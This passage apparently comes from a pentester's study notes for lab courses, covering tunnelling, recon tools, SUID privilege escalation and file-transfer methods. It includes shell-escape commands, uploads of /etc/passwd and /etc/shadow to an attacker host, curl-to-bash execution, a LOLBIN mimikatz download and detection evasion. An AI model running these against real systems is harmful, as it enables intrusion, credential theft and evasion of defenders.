                        As you can see, this time around we speciify a single local port to which we will direct all the traffic needing forwarding.

                        If we now try running the same psql command as before, we will get an error. That is because this time around we did not specify a target port for our traffic to be directed to, meaning psql is just sending traffic into the established local socket on port 1234, but never reaches the To make use of dynamic port forwarding, a tool such as proxychains is especially useful.

                        In summary and as the name implies, proxychains can be used to tunnel a connection through multiple proxies; a use case for this could be increasing anonymity, as the origin of a connection would be significantl more difficult to trace.

                        In our case, we would only tunnel through one such \"proxy\"; the target machine. The tool is pre-installed on most pentesting distributions (such as ParrotOS and Kali Linux ) and is highly customisable, featuring an array of strategies for tunneling, which can be tampered with in itis configuration file /etc/proxychains4.conf.

                        The minimal changes that we have to make to the file for proxychains to work in our current use case is to:

                        1. Ensure that strict_chain is not commented out; ( dynamic_chain and random_chain should be commented out)
                        2. At the very bottom of the file, under [ProxyList], we specify the socks5 (or socks4 ) host and port that we used for our tunnel

                        In our case, it would look something like this, as our tunnel is listening at localhost:1234. PostgreSQL service on the target machine.

                        [ProxyList]\n# add proxy here ...\n# meanwile\n# defaults set to \"tor\"\n#socks4 127.0.0.1 9050\nsocks5 127.0.0.1 1234\n

                        Having configured proxychains correctly, we can now connect to the PostgreSQL service on the target, as if we were on the target machine ourselves! This is done by prefixing whatever command we want to run with proxychains:

                        proxychains psql -U NameOfUserOfAttackedMachine -h localhost -p 5432\n
                        "},{"location":"sshpass/","title":"sshpass - A program to pass passwords in the command line to ssh","text":"

                        sshpass is a program that allows us to pass passwords in the command line to ssh. This way we can automate the login process.

                        ","tags":["tools"]},{"location":"sshpass/#installation","title":"Installation","text":"
                        sudo apt install sshpass\n
                        ","tags":["tools"]},{"location":"sshpass/#usage","title":"Usage","text":"
                        sshpass -p 'thepasswordisthis' ssh user@IP\n
                        ","tags":["tools"]},{"location":"sslyze/","title":"sslyze - A tool for scanning certificates","text":"

                        Analyze the SSL/TLS configuration of a server by connecting to it, in order to ensure that it uses strong encryption settings (certificate, cipher suites, elliptic curves, etc.), and that it is not vulnerable to known TLS attacks (Heartbleed, ROBOT, OpenSSL CCS injection, etc.).

                        ","tags":["pentesting","web pentesting"]},{"location":"sslyze/#installation","title":"Installation","text":"

                        Preinstalled in kali.

                        Download it from: https://github.com/nabla-c0d3/sslyze.

                        ","tags":["pentesting","web pentesting"]},{"location":"sslyze/#basic-usage","title":"Basic usage","text":"
                        sslyze --certinfo <DOMAIN>\n

                        In order not to have false positive regarding hostname validation, use the domain (not IP).

                        ","tags":["pentesting","web pentesting"]},{"location":"sublist3r/","title":"sublist3r - A subdomain enumerating tool","text":"

                        Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. Easily blocked by Google.

                        ","tags":["scanning","subdomains","reconnaissance","pentesting"]},{"location":"sublist3r/#installation","title":"Installation","text":"
                        git clone https://github.com/aboul3la/Sublist3r\ncd sublist3r\nsudo pip install -r requirements.txt\n
                        ","tags":["scanning","subdomains","reconnaissance","pentesting"]},{"location":"sublist3r/#usage","title":"Usage","text":"

                        From sublist3r directory:

                        python3 sublist3r.py -d example.com -o file.txt\n# -d: Specify the domain.\n# -o file.txt: It prints the results to a file\n# -b: Enable the bruteforce module. This built-in module relies on the names.txt wordlist. To find it, use: locate names.txt (you can edit it).\n\n# Select an engine for enumeration, for instance, google.\npython3 sublist3r.py -d example.com -e google\n
                        ","tags":["scanning","subdomains","reconnaissance","pentesting"]},{"location":"suid-binaries/","title":"Suid binaries","text":"

                        Resources: https://gtfobins.github.io/ contains a list of commands and how they can be exploited through \"sudo\".

                        Equivalent to suid binaries in Windows would be: LOLBAS

                        ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#most-used-by-me","title":"Most used (by me)","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#find","title":"find","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#shell","title":"Shell","text":"

                        It can be used to break out from restricted environments by spawning an interactive system shell.

                        find . -exec /bin/sh \\; -quit\n
                        ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#suid","title":"SUID","text":"

                        If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.

                        This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.

                        sudo install -m =xs $(which find) .\n\n./find . -exec /bin/sh -p \\; -quit\n
                        ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#sudo","title":"Sudo","text":"

                        If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

                        sudo find . -exec /bin/sh \\; -quit\n
                        ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#vi","title":"vi","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#shell_1","title":"Shell","text":"

                        It can be used to break out from restricted environments by spawning an interactive system shell.

                        #one way\nvi -c ':!/bin/sh' /dev/null\n\n# another way\nvi\n:set shell=/bin/sh\n:shell\n
                        Used at HTB machine Vaccine.

                        ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#sudo_1","title":"Sudo","text":"

                        If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

                        sudo vi -c ':!/bin/sh' /dev/null\n
                        ","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#php","title":"php","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"suid-binaries/#sudo_2","title":"Sudo","text":"

                        If the binary is allowed to run as superuser by\u00a0sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

                        • CMD=\"/bin/sh\" sudo php -r \"system('$CMD');\"
                        ","tags":["pentesting","privilege escalation","linux"]},{"location":"sys-internals-suite/","title":"SysInternals Suite","text":"

                        To download: https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite.

                        ","tags":["windows","thick applications"]},{"location":"sys-internals-suite/#tpcview","title":"TPCView","text":"

                        Application that allows you to see incoming and outcoming network connections associated to their application.

                        In the course \"Mastering Thick Application Pentesting\" this is really helpfil to check the conections of the vulnerable applicaiton DVTA.

                        ","tags":["windows","thick applications"]},{"location":"sys-internals-suite/#process-monitor","title":"Process Monitor","text":"

                        This tools helps us understand File System changes and what is being accessed in the file system.

                        ","tags":["windows","thick applications"]},{"location":"sys-internals-suite/#strings","title":"Strings","text":"

                        It's similar to the command \"strings\" in bash. It displays all the human readable strings in a binary. Usage:

                        strings.exe <binaryFile>\n
                        ","tags":["windows","thick applications"]},{"location":"sys-internals-suite/#sigcheck","title":"Sigcheck","text":"

                        Sigcheck is a command-line utility that shows file version number, timestamp information, and digital signature details, including certificate chains.

                        .\\sigcheck.exe -nobanner -s -e <folder/binaryFile>\n# -s: Search recursively, useful for thick client apps with lot of folders and subfolders\n# -e: Scan executable images only (regardless of their extension)\n# -nobanner:    Do not display the startup banner and copyright message.\n
                        ","tags":["windows","thick applications"]},{"location":"sys-internals-suite/#psexec","title":"PsExec","text":"

                        PsExec\u00a0is a tool that lets us execute processes on other systems, complete with full interactivity for console applications, without having to install client software manually. It works because it has a Windows service image inside of its executable. It takes this service and deploys it to the admin$ share (by default) on the remote machine. It then uses the DCE/RPC interface over SMB to access the Windows Service Control Manager API. Next, it starts the PSExec service on the remote machine. The PSExec service then creates a\u00a0named pipe\u00a0that can send commands to the system.

                        ","tags":["windows","thick applications"]},{"location":"tcpdump/","title":"tcpdump - A\u00a0command-line packet analyzer","text":"

                        It dumps all tcp connections from a .pcap file. Also tcpdump prints out a description of the contents of packets on a network interface that match the Boolean expression

                        ","tags":["pentesting","reconnaissance"]},{"location":"tcpdump/#installation","title":"Installation","text":"

                        https://www.tcpdump.org/

                        ","tags":["pentesting","reconnaissance"]},{"location":"tcpdump/#usage","title":"Usage","text":"
                        tcpdump -nntttAr <nameOfFile.pcap> \n\n# Exit after receiving count packets.\n-c count\n\n# Save the packet data to a file for later analysis\n-w \n\n# Read  from  a saved  packet  file\n-r\n\n# Print out all captured packages\n-A\n
                        ","tags":["pentesting","reconnaissance"]},{"location":"the-harvester/","title":"The Harvester - A tool for pasive and active reconnaissance","text":"

                        The Harvester: simple-to-use yet powerful and effective tool for early-stage penetration testing and red team engagements. We can use it to gather information to help identify a company's attack surface. The tool collects emails, names, subdomains, IP addresses, and URLs from various public data sources for passive information gathering. It has modules.

                        Automate the modules we want to launch:

                        1. Create a list of sources, one per line, sources.txt.

                        2. Execute:

                         cat sources.txt | while read source; do theHarvester -d \"${TARGET}\" -b $source -f \"${source}_${TARGET}\";done\n

                        3. When the process finishes, extract all the subdomains found and sort them:

                        cat *.json | jq -r '.hosts[]' 2>/dev/null | cut -d':' -f 1 | sort -u > \"${TARGET}_theHarvester.txt\"\n

                        4. Merge all the passive reconnaissance files:

                        cat facebook.com_*.txt | sort -u > facebook.com_subdomains_passive.txt\n$ cat facebook.com_subdomains_passive.txt | wc -l\n
                        ","tags":["pentesting","reconnaissance","tools"]},{"location":"tmux/","title":"Tmux - A terminal multiplexer","text":"","tags":["pentesting","terminal","shells"]},{"location":"tmux/#installation","title":"Installation","text":"
                        sudo apt install tmux -y\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"tmux/#basic-usage","title":"Basic usage","text":"

                        start new:

                        tmux\n

                        start new with session name:

                        tmux new -s myname\n

                        attach:

                        tmux a  #  (or at, or attach)\n

                        attach to named:

                        tmux a -t myname\n

                        list sessions:

                        tmux ls\n

                        kill session:

                        tmux kill-session -t myname\n

                        Kill all the tmux sessions:

                        tmux ls | grep : | cut -d. -f1 | awk '{print substr($1, 0, length($1)-1)}' | xargs kill\n

                        In tmux, hit the prefix ctrl+b (my modified prefix is ctrl+a) and then:

                        List all shortcuts

                        ","tags":["pentesting","terminal","shells"]},{"location":"tomcat-pentesting/","title":"Pentesting tomcat","text":"

                        Usually found on port 8080.

                        Default credentials:

                        admin:admin\ntomcat:tomcat\nadmin:<NOTHING>\nadmin:s3cr3t\ntomcat:s3cr3t\nadmin:tomcat\ntomcat:tomca\n

                        Dictionaries:

                        ","tags":["web pentesting","techniques"]},{"location":"tomcat-pentesting/#directory-enumeration","title":"Directory enumeration","text":"","tags":["web pentesting","techniques"]},{"location":"tomcat-pentesting/#brute-force","title":"Brute force","text":"
                        hydra -l tomcat -P /usr/share/wordlists/SecLists-master/Passwords/darkweb2017-top1000.txt -f $ip http-get /manager/html \n
                        ","tags":["web pentesting","techniques"]},{"location":"transferring-files-evading-detection/","title":"Evading detection in file transfers","text":"","tags":["evading detection","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-evading-detection/#changing-user-agent","title":"Changing User Agent","text":"

                        Request with Invoke-WebRequest and Chrome User agent

                        Listing user agents:

                        [Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label=\"User Agent\";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl\n
                        Name       : InternetExplorer\nUser Agent : Mozilla/5.0 (compatible; MSIE 9.0; Windows NT; Windows NT 10.0; en-US)\n\nName       : FireFox\nUser Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) Gecko/20100401 Firefox/4.0\n\nName       : Chrome\nUser Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0\n             Safari/534.6\n\nName       : Opera\nUser Agent : Opera/9.70 (Windows NT; Windows NT 10.0; en-US) Presto/2.2.1\n\nName       : Safari\nUser Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0\n             Safari/533.16\n

                        Using Chrome User Agent:

                        Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile \"C:\\Users\\Public\\nc.exe\"\n
                        nc -lvnp 80\n
                        ","tags":["evading detection","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-evading-detection/#lolbas-gtfobins","title":"LOLBAS / GTFOBins","text":"

                        Application whitelisting may prevent you from using PowerShell or Netcat, and command-line logging may alert defenders to your presence. In this case, an option may be to use a \"LOLBIN\" (living off the land binary), alternatively also known as \"misplaced trust binaries.\" An example LOLBIN is the Intel Graphics Driver for Windows 10 (GfxDownloadWrapper.exe), installed on some systems and contains functionality to download configuration files periodically. This download functionality can be invoked as follows:

                        GfxDownloadWrapper.exe \"http://10.10.10.132/mimikatz.exe\" \"C:\\Temp\\nc.exe\"\n

                        Such a binary might be permitted to run by application whitelisting and be excluded from alerting.

                        ","tags":["evading detection","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/","title":"Transferring files with code","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#python","title":"Python","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#python2-download","title":"python2 Download","text":"
                        python2.7 -c 'import urllib;urllib.urlretrieve (\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\", \"LinEnum.sh\")'\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#python-3-download","title":"Python 3 - Download","text":"
                        python3 -c 'import urllib.request;urllib.request.urlretrieve(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\", \"LinEnum.sh\")'\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#upload-operations-using-python3","title":"Upload Operations using Python3","text":"

                        uploadserver

                        # Start the Python uploadserver Module\npython3 -m uploadserver \n\n# Uploading a File Using a Python One-liner\npython3 -c whet'import requests;requests.post(\"http://192.168.49.128:8000/upload\",files={\"files\":open(\"/etc/passwd\",\"rb\")})'\n

                        htb-student | Password:HTB_@cademy_stdnt!)

                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#php","title":"PHP","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#php-download-with-file_get_contents","title":"PHP Download with File_get_contents()","text":"
                        # PHP file_get_contents() module to download content from a website combined with the file_put_contents() module to save the file into a directory. PHP can be used to run one-liners from an operating system command line using the option -r.\nphp -r '$file = file_get_contents(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\"); file_put_contents(\"LinEnum.sh\",$file);'\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#php-download-with-fopen","title":"PHP Download with Fopen()","text":"
                        php -r 'const BUFFER = 1024; $fremote = \nfopen(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\", \"rb\"); $flocal = fopen(\"LinEnum.sh\", \"wb\"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#php-download-a-file-and-pipe-it-to-bash","title":"PHP Download a File and Pipe it to Bash","text":"
                        php -r '$lines = @file(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\"); foreach ($lines as $line_num => $line) { echo $line; }' | bash\n# The URL can be used as a filename with the @file function if the fopen wrappers have been enabled. \n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#ruby","title":"Ruby","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#download-a-file","title":"Download a File","text":"
                        ruby -e 'require \"net/http\"; File.write(\"LinEnum.sh\", Net::HTTP.get(URI.parse(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\")))'\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#perl","title":"Perl","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#download-a-file_1","title":"Download a File","text":"
                        perl -e 'use LWP::Simple; getstore(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\", \"LinEnum.sh\");'\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#javascript","title":"JavaScript","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#download-a-file-with-wgetjs","title":"Download a file with wget.js","text":"

                        wget.js content:

                        var WinHttpReq = new ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");\nWinHttpReq.Open(\"GET\", WScript.Arguments(0), /*async=*/false);\nWinHttpReq.Send();\nBinStream = new ActiveXObject(\"ADODB.Stream\");\nBinStream.Type = 1;\nBinStream.Open();\nBinStream.Write(WinHttpReq.ResponseBody);\nBinStream.SaveToFile(WScript.Arguments(1));\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#download-a-file-using-javascript-and-cscriptexe","title":"Download a File Using JavaScript and cscript.exe","text":"

                        Console Based Script Host from Microsoft Corporation belonging to Microsoft (r) Windows Script Host.

                        cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#vbscript","title":"VBScript","text":"

                        VBScript (\"Microsoft Visual Basic Scripting Edition\") is an Active Scripting language developed by Microsoft that is modeled on Visual Basic.

                        We'll create a file called wget.vbs and save the following content:

                        dim xHttp: Set xHttp = createobject(\"Microsoft.XMLHTTP\")\ndim bStrm: Set bStrm = createobject(\"Adodb.Stream\")\nxHttp.Open \"GET\", WScript.Arguments.Item(0), False\nxHttp.Send\n\nwith bStrm\n    .type = 1\n    .open\n    .write xHttp.responseBody\n    .savetofile WScript.Arguments.Item(1), 2\nend with\n

                        Now, download a File Using VBScript and cscript.exe

                        cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#netcat","title":"Netcat","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#printing-information-on-screen","title":"Printing information on screen","text":"

                        On the server side (attacking machine):

                        #data will be printed on screen\nnc -lvp <port>  \n

                        On the client side (victim's machine):

                        echo \u201chello\u201d | nc -v $ip <port>\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#transfer-data-and-save-it-in-a-file-with-netcat","title":"Transfer data and save it in a file with netcat","text":"","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#victims-machine-listening-on-port","title":"Victim's Machine listening on <Port>","text":"

                        On the client side (victim's machine):

                        nc -lvp <port> --recv-only > received.txt  \n# --recv-only: to close the connection once the file transfer is finished.\n

                        On the server side (attacking machine):

                        # Data will be stored in reveived.txt file.\ncat tobesentfile.txt | nc -v $ip <port>\n# The option -q 0 will tell Netcat to close the connection once it finishes. \n\n# Alternative:\nnc -q 0 $ipVictim <port> < tobesentfile.txt \n\nncat --send-only $ipVictim <port> < tobesentfile.txt \n# The --send-only flag, when used in both connect and listen modes, prompts Ncat to terminate once its input is exhausted.\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#victims-machine-connects-to-netcat-only-to-receive-the-file","title":"Victim's machine connects to netcat only to receive the file","text":"

                        Instead of listening on our compromised machine, we can connect to a port on our attack host to perform the file transfer operation. This method is useful in scenarios where there's a firewall blocking inbound connections. Let's listen on port 443 on our Pwnbox and send the file SharpKatz.exe as input to Netcat.

                        On the server side (attacking machine):

                        sudo nc -l -p 443 -q 0 < tobesentfile.txt\n\nncat -l -p 443 --send-only < tobesentfile.txt\n

                        On the client side (victim's machine): Compromised Machine Connect to Netcat to Receive the File

                        nc $ipAttacker 443 > tobesentfile.txt\n\nncat $ipAttacker 443 --recv-only > tobesentfile.txt\n\n# Using /dev/tcp to Receive the File\ncat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#powershell-session-file-transfer","title":"PowerShell Session File Transfer","text":"

                        PowerShell Remoting uses Windows Remote Management (WinRM), which is the Microsoft implementation of the Web Services for Management (WS-Management) protocol, to allow users to run PowerShell commands on remote computers.

                        To create a PowerShell Remoting session on a remote computer, we will need administrative access, be a member of the Remote Management Users group, or have explicit permissions for PowerShell Remoting in the session configuration.

                        Let's create an example and transfer a file from DC01 to DATABASE01 and vice versa.

                        PS C:\\htb> whoami\n\nhtb\\administrator\n\nPS C:\\htb> hostname\n\nDC01\n
                        Test-NetConnection -ComputerName DATABASE01 -Port 5985\n\nComputerName     : DATABASE01\nRemoteAddress    : 192.168.1.101\nRemotePort       : 5985\nInterfaceAlias   : Ethernet0\nSourceAddress    : 192.168.1.100\nTcpTestSucceeded : True\n

                        Because this session already has privileges over DATABASE01, we don't need to specify credentials.

                        Create a PowerShell Remoting Session to DATABASE01

                        PS C:\\htb> $Session = New-PSSession -ComputerName DATABASE01\n

                        We can use the Copy-Item cmdlet to copy a file from our local machine DC01 to the DATABASE01 session we have $Session or vice versa.

                        Copy samplefile.txt from our Localhost to the DATABASE01 Session

                        PS C:\\htb> Copy-Item -Path C:\\samplefile.txt -ToSession $Session -Destination C:\\Users\\Administrator\\Desktop\\\n

                        Copy DATABASE.txt from DATABASE01 Session to our Localhost

                        PS C:\\htb> Copy-Item -Path \"C:\\Users\\Administrator\\Desktop\\DATABASE.txt\" -Destination C:\\ -FromSession $Session\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#rdp","title":"RDP","text":"

                        RDP (Remote Desktop Protocol) is commonly used in Windows networks for remote access.

                        We can use xfreerdp or rdesktop to download a file by mounting a linux folder. This shared will allow us to transfer files to and from the RDP session.

                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#mounting-a-linux-folder-using-rdesktop","title":"Mounting a Linux Folder Using rdesktop","text":"
                        rdesktop $ipVictim -d <domain> -u <username> -p <'Password0@'> -r disk:linux=\"/home/user/rdesktop/files\"\n
                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-code/#mounting-a-linux-folder-using-xfreerdp","title":"Mounting a Linux Folder Using xfreerdp","text":"

                        bash xfreerdp /v:ipVictim /d:<domain> /u:<username> /p:<'Password0@'> /drive:linux,/home/plaintext/htb/academy/filetransfer

                        To access the directory, we can connect to \\tsclient\\ in Windows, allowing us to transfer files to and from the RDP session.

                        ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/","title":"Transferring files techniques - Linux","text":"","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#replicating-client-server","title":"Replicating client-server","text":"","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#1-setting-up-a-server-in-the-attacking-machine","title":"1. Setting up a server in the attacking machine","text":"

                        See different techniques

                        ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#2-download-files-from-victims-machine","title":"2. Download files from victim's machine","text":"","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#wget","title":"wget","text":"
                        wget http://<SERVERIP>:<SERVERPORT>/<file>\n
                        ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#curl","title":"curl","text":"
                        curl http://http://<SERVERIP>:<SERVERPORT>/<file> -o <OutputNameForFile>\n
                        ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#fileless-downloads-using-linux","title":"Fileless downloads using Linux","text":"

                        Because of the way Linux works and how pipes operate, most of the tools we use in Linux can be used to replicate fileless operations, which means that we don't have to download a file to execute it.

                        ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#fileless-download-with-curl","title":"Fileless Download with cURL","text":"
                        curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash\n
                        ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#fileless-download-with-wget","title":"Fileless Download with wget","text":"
                        wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3\n
                        ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#bash-downloads","title":"Bash downloads","text":"

                        On the server side (attacking machine), setup a server by using one of the methodologies applied above.

                        On the client side (victim's machine):

                        # Connecting to the Target Webserver (attacking machine serving the file)\nexec 3<>/dev/tcp/$ip/80\n\n# Requesting the file to the server \necho -e \"GET /file.sh HTTP/1.1\\n\\n\">&3\n\n# Printing the Response\ncat <&3\n
                        ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#ssh-downloads-and-uploads-scp","title":"SSH downloads and uploads: SCP","text":"

                        SSH implementation comes with an SCP utility for remote file transfer that, by default, uses the SSH protocol.

                        Two requirements:

                        • we have ssh user credentials on the remote host
                        • ssh is open on port 22

                        On the server's side (attacker's machine):

                        # Enable the service\nsudo systemctl enable ssh\n\n# Start the server\nsudo systemctl start ssh\n\n# Check if port is listening\nnetstat -lnpt\n

                        From the attacker machine too:

                        # Download file foobar.txt saved in the victim's machin. Command is run from attacker machine connecting to the remote host (victim's machine)\nscp username@$IPvictim:foobar.txt /some/local/directory\n\n# Upload file foo.txt saved in attacker machine into the victim's. Command is run from attacker machine connecting to the remote host (victim's machine)\nscp foo.txt username@$IPvictim:/some/remote/directory\n
                        ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#base64","title":"Base64","text":"

                        To avoid firewall protections we can:

                        1. Base64 encode the file:

                        base64 file.php -w 0\n\n# Alternative\ncat file |base64 -w 0;echo\n

                        2. Copy the base64 string, go to the remote host and decode it and pipe to a file:

                        echo -n \"Looooooong-string-encoded-in-base64\" | base64 -d > file.php\n# -n: do not output the trailing newline\n
                        ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#web-upload","title":"Web upload","text":"

                        We can use uploadserver.

                        # Install\npython3 -m pip install --user uploadserver\n\n# As we will use https, we will create a self-signed certificate. This file should be hosted in a different location from the web server folder\nopenssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'\n\n# Start the web server\npython3 -m uploadserver 443 --server-certificate /location/different/folder/server.pem\n\n# Now from our compromised machine, let's upload the `/etc/passwd` and `/etc/shadow` files.\ncurl -X POST https://$attackerIP/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure\n# We used the option --insecure because we used a self-signed certificate that we trust.\n
                        ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#backdoors","title":"Backdoors","text":"

                        See reverse shells, bind shells, and web shells.

                        ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/","title":"Transferring files techniques - Windows","text":"

                        See different techniques to set up a server in the attacking machine, probably a Kali

                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-base64-encode-decode","title":"PowerShell Base64 Encode & Decode","text":"","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#upload-from-linux-attacker-to-windows-victim","title":"Upload from linux (attacker) to Windows (victim)","text":"

                        If we have access to a terminal, we can encode a file to a base64 string, copy its contents from the terminal and perform the reverse operation, decoding the file in the original content.

